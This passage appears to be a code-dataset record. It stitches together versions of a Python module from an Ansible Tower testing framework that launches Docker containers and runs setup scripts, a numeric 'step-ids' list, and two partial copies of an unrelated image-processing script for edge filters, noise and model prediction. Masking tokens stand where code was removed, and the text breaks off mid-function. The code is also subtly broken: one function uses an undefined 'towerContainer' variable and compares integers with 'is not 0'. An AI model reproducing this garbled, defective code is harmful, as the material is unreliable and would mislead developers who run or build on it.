rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.7' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.8' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n setupCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh\"'.\n format(towerVersion))\n setupLbCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true\"'\n .format(towerVersion))\n inventoryDbVersion = towerVersion.replace('.', '')\n modifyInventoryDbCmd = (\n \"sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory\".\n format(inventoryDbVersion, towerVersion))\n runDatabaseCmd = clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)\n if loadBalance:\n print(color(\n 'INFO: Running ./setup.sh with load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupLbCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n 
else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupLbCmd)\n else:\n print(color(\n 'INFO: Running ./setup.sh with no load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupCmd)\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if runSetupCmd[0] is not 0:\n clusterStatus = False\n return clusterStatus\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName,\n debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runOpts)\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n 
containerName, mem_limit=allowedMemory, ports={'443/tcp': None}\n )\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': None})\n elif allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp':\n externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n",
"step-4": "<mask token>\nimport towerdev.common\nimport towerdev.utilities\nfrom colors import *\ndockerClient = towerdev.common.dockerClient()\n\n\ndef runContainer(purpose, externalPort, osVersion, containerName, debug=\n True, **kwargs):\n \"\"\"Run supplemental container from pre-existing image\"\"\"\n if debug == True:\n runSpecialOpts = dict(purpose=purpose, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runSpecialOpts)\n if purpose == 'ssh':\n if osVersion == 'centos7':\n sshContainer = dockerClient.containers.run('centos7/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n elif osVersion == 'centos8':\n sshContainer = dockerClient.containers.run('centos8/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n\n\ndef runContainerCluster(towerVersion, osVersion, namingConvention, stream=\n True, **kwargs):\n \"\"\"Run Tower containers in a clustered setup\"\"\"\n externalPort = None\n containerCount = 3\n debug = True\n loadBalance = False\n if debug:\n runClusterOpts = dict(towerVersion=towerVersion, osVersion=\n osVersion, loadBalance=loadBalance, namingConvention=\n namingConvention, externalPort=externalPort, containerCount=\n containerCount, debug=debug)\n print(runClusterOpts)\n check = towerdev.utilities.imageCheck(towerVersion)\n if check is False:\n print(color(\n 'ERROR: Deployment of container cluster failed. 
Please make sure the specified version of Tower has an image built.'\n , fg='red'))\n return False\n else:\n for c in range(containerCount):\n runTowerContainer(towerVersion=towerVersion, externalPort=\n externalPort, osVersion=osVersion, containerName='{0}-{1}'.\n format(namingConvention, c))\n clusterContainers = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n containerIps = []\n for c in range(len(clusterContainers)):\n containerIp = clusterContainers[c].attrs['NetworkSettings']['IPAddress'\n ]\n containerIps.append(containerIp)\n print(clusterContainers[0])\n if '3.5' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.5.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.6' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.6.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.7' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.7.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.8' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.8.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n if '3.5' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.6' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} 
rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.7' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.8' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n setupCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh\"'.\n format(towerVersion))\n setupLbCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true\"'\n .format(towerVersion))\n inventoryDbVersion = towerVersion.replace('.', '')\n modifyInventoryDbCmd = (\n \"sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory\".\n format(inventoryDbVersion, towerVersion))\n runDatabaseCmd = clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)\n if loadBalance:\n print(color(\n 'INFO: Running ./setup.sh with load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupLbCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n 
else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupLbCmd)\n else:\n print(color(\n 'INFO: Running ./setup.sh with no load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupCmd)\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if runSetupCmd[0] is not 0:\n clusterStatus = False\n return clusterStatus\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName,\n debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runOpts)\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n 
containerName, mem_limit=allowedMemory, ports={'443/tcp': None}\n )\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': None})\n elif allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp':\n externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n",
"step-5": "#!/usr/bin/env python3\n\n''' towerdev - Ansible Tower Testing Framework\n\nMIT License\n\nCopyright © 2021 falcon78921\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n'''\n\nimport towerdev.common\nimport towerdev.utilities\nfrom colors import *\n\n# Invoke dockerClient()\n\ndockerClient = towerdev.common.dockerClient()\n\ndef runContainer(purpose, externalPort, osVersion, containerName, debug=True, **kwargs):\n \"\"\"Run supplemental container from pre-existing image\"\"\"\n\n # Optional debug that prints a dict of options\n if debug == True:\n runSpecialOpts = dict(purpose=purpose, externalPort=externalPort, osVersion=osVersion, containerName=containerName)\n print(runSpecialOpts)\n\n # Determines what we do based on purpose\n if purpose == \"ssh\":\n if osVersion == \"centos7\":\n sshContainer = dockerClient.containers.run('centos7/systemd', privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, 
name=containerName, ports={'22/tcp':externalPort})\n elif osVersion == \"centos8\":\n sshContainer = dockerClient.containers.run('centos8/systemd', privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'22/tcp':externalPort})\n\n containersList = dockerClient.containers.list(filters={'name': containerName})\n\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n\n return creationStatus\n\ndef runContainerCluster(towerVersion, osVersion, namingConvention, stream=True, **kwargs):\n \"\"\"Run Tower containers in a clustered setup\"\"\"\n # runContainerCluster() defaults; can be overriden via **kwargs\n externalPort = None\n containerCount = 3\n debug = True\n loadBalance = False\n\n # Optional debug that prints a dict of options\n if debug:\n runClusterOpts = dict(towerVersion=towerVersion, osVersion=osVersion, loadBalance=loadBalance, namingConvention=namingConvention, externalPort=externalPort, containerCount=containerCount, debug=debug)\n print(runClusterOpts)\n\n # Check to see if specified towerVersion has image built\n check = towerdev.utilities.imageCheck(towerVersion)\n\n # How we proceed with imageCheck() return\n if check is False:\n print(color(\"ERROR: Deployment of container cluster failed. 
Please make sure the specified version of Tower has an image built.\", fg=\"red\"))\n return False\n else:\n for c in range(containerCount):\n runTowerContainer(towerVersion=towerVersion, externalPort=externalPort, osVersion=osVersion, containerName=\"{0}-{1}\".format(namingConvention,c))\n\n clusterContainers = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})\n containerIps = []\n\n # Gather container IPs for inventory fillout\n for c in range(len(clusterContainers)):\n containerIp = clusterContainers[c].attrs['NetworkSettings']['IPAddress']\n containerIps.append(containerIp)\n\n print(clusterContainers[0])\n\n # Choose inventory file based on towerVersion\n if \"3.5\" in towerVersion:\n chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.5.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif \"3.6\" in towerVersion:\n chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.6.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif \"3.7\" in towerVersion:\n chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.7.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif \"3.8\" in towerVersion:\n chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.8.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n\n # Choose messaging backend based on towerVersion\n if \"3.5\" in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)\n runInventoryCmd = 
clusterContainers[0].exec_run(cmd=modifyInventoryCmd)\n elif \"3.6\" in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)\n elif \"3.7\" in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)\n elif \"3.8\" in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)\n\n # Call ./setup.sh from first container in list\n setupCmd = '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh\"'.format(towerVersion)\n setupLbCmd = '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true\"'.format(towerVersion)\n inventoryDbVersion = towerVersion.replace(\".\", \"\")\n modifyInventoryDbCmd = \"sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory\".format(inventoryDbVersion, towerVersion)\n runDatabaseCmd = clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)\n\n if loadBalance:\n print(color(\"INFO: Running ./setup.sh with load balance configuration...\", fg=\"yellow\"))\n\n # Stream output based on option\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container=\"{0}-{1}\".format(namingConvention, calcRunContainer), cmd=setupLbCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'], stream=True, detach=False)\n\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = 
inspect['ExitCode']\n\n containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})\n\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n\n if setupCmdCode is not 0:\n clusterStatus = False\n\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupLbCmd)\n\n else:\n print(color(\"INFO: Running ./setup.sh with no load balance configuration...\", fg=\"yellow\"))\n\n # Stream output based on option\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container=\"{0}-{1}\".format(namingConvention, calcRunContainer), cmd=setupCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'], stream=True, detach=False)\n\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})\n\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n\n if setupCmdCode is not 0:\n clusterStatus = False\n\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupCmd)\n containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})\n\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n\n if runSetupCmd[0] is not 0:\n clusterStatus = False\n\n return clusterStatus\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName, debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n\n # Optional debug that prints a dict of options\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort, osVersion=osVersion, containerName=containerName)\n print(runOpts)\n\n # Determines what we 
do based on externalPort input\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, mem_limit=allowedMemory, ports={'443/tcp':None})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'443/tcp':None})\n else:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, mem_limit=allowedMemory, ports={'443/tcp':externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'443/tcp':externalPort})\n\n containersList = dockerClient.containers.list(filters={'name': containerName})\n\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n\n return creationStatus\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def preprocess_image(image_path, desired_size=SIZE):
"""
Resize the picture to the desired size
:param image_path: the path of image folder
:param desired_size: the size that image will be cropped as. The default size is 224*224
:return: the cropped image
"""
im = Image.open(image_path)
im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)
return im
def set_data(img_path, dataframe):
"""
Correspond the image to the label and return them.
:param img_path: the path of images' folder
:param dataframe: the .csv file that shows relation between image and label
:return: Image, Label and the name of Image
"""
N = len(os.listdir(img_path))
x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)
y_ = np.empty(N)
image_names = np.empty(N, dtype=np.dtype(('U', 15)))
for i, img_name in enumerate(tqdm(os.listdir(img_path))):
x_[i, :, :, :] = preprocess_image(img_path + img_name)
y_[i] = dataframe.loc[img_name.split('.')[0], 'level']
image_names[i] = img_name
return x_, y_
def predict(X):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
ret = model.predict(X)
return ret
def sobel(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def canny(img_set):
ret = np.empty(img_set.shape)
for i, image in enumerate(tqdm(img_set)):
blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
edge_output = cv.Canny(gray, 50, 150)
dst = cv.bitwise_and(image, image, mask=edge_output)
print(dst)
ret[i, :] = dst
return ret
def scharr(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def laplace(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)
dst = cv.convertScaleAbs(gray_lap)
ret[i, :] = dst
return ret
<|reserved_special_token_0|>
def gasuss_noise(img_set, mean=0, var=0.01):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
image = np.array(image / 255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.0
else:
low_clip = 0.0
out = np.clip(out, low_clip, 1.0)
out = np.uint8(out * 255)
ret[m, :] = out
return ret
def ouput_csv(X_, Y_, csv_path):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
data = model.predict(X_)
dataDF = pd.DataFrame(data)
dataDF['level'] = Y_[:, 0]
dataDF['label'] = Y_[:, 1]
print(dataDF)
dataDF.to_csv(csv_path, index=False)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def preprocess_image(image_path, desired_size=SIZE):
"""
Resize the picture to the desired size
:param image_path: the path of image folder
:param desired_size: the size that image will be cropped as. The default size is 224*224
:return: the cropped image
"""
im = Image.open(image_path)
im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)
return im
def set_data(img_path, dataframe):
"""
Correspond the image to the label and return them.
:param img_path: the path of images' folder
:param dataframe: the .csv file that shows relation between image and label
:return: Image, Label and the name of Image
"""
N = len(os.listdir(img_path))
x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)
y_ = np.empty(N)
image_names = np.empty(N, dtype=np.dtype(('U', 15)))
for i, img_name in enumerate(tqdm(os.listdir(img_path))):
x_[i, :, :, :] = preprocess_image(img_path + img_name)
y_[i] = dataframe.loc[img_name.split('.')[0], 'level']
image_names[i] = img_name
return x_, y_
def predict(X):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
ret = model.predict(X)
return ret
def sobel(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def canny(img_set):
ret = np.empty(img_set.shape)
for i, image in enumerate(tqdm(img_set)):
blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
edge_output = cv.Canny(gray, 50, 150)
dst = cv.bitwise_and(image, image, mask=edge_output)
print(dst)
ret[i, :] = dst
return ret
def scharr(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
